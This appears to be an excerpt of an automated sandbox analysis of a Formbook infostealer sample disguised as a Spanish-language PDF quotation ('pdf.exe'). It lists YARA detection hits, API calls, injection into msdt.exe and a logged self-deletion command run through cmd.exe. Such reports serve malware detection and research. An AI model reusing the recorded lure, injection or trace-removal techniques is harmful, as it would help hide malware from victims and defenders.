          Source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Solicitud urgente de Quotaion_U1197,pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 0_2_018FC694
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 0_2_018FEAC8
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 0_2_018FEAD8
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_00401030
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041D96B
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_004012FB
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041EB91
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041DC7D
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_00402D87
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_00402D90
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_00409E5F
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_00409E60
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_00402FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CD466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D1D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04600D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D2D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D25DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04632581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04626E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CD616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D2EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D1FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046DDFCE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046DE824
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D28EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D20A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461B090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04624120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460F900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046BFA2B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D22AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462AB40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D2B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C03DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CDBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463EBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0013EB91
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00122D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00122D87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00129E5F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00129E60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00122FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0460B150 appears 45 times
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041A360 NtCreateFile,
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041A410 NtReadFile,
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041A490 NtClose,
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041A3B3 NtReadFile,
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041A40B NtReadFile,
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041A53A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0464AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0464A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0464A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0464B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04649B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0464A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0013A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0013A410 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0013A490 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0013A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0013A3B3 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0013A40B NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0013A53A NtAllocateVirtualMemory,
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.303421027.00000000065B0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300643719.0000000003301000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.299924713.0000000000F8E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameOSVERSIONIN.exe4 vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000004.00000002.295521309.00000000000FE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameOSVERSIONIN.exe4 vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000000.296575985.0000000000DBE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameOSVERSIONIN.exe4 vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.374490379.0000000003680000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.373544192.0000000001A0F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.373171059.000000000187F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000003.365732847.0000000003680000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exeBinary or memory string: OriginalFilenameOSVERSIONIN.exe4 vs Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: Solicitud urgente de Quotaion_U1197,pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Solicitud urgente de Quotaion_U1197,pdf.exeVirustotal: Detection: 40%
          Source: Solicitud urgente de Quotaion_U1197,pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe"
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess created: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess created: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess created: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess created: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
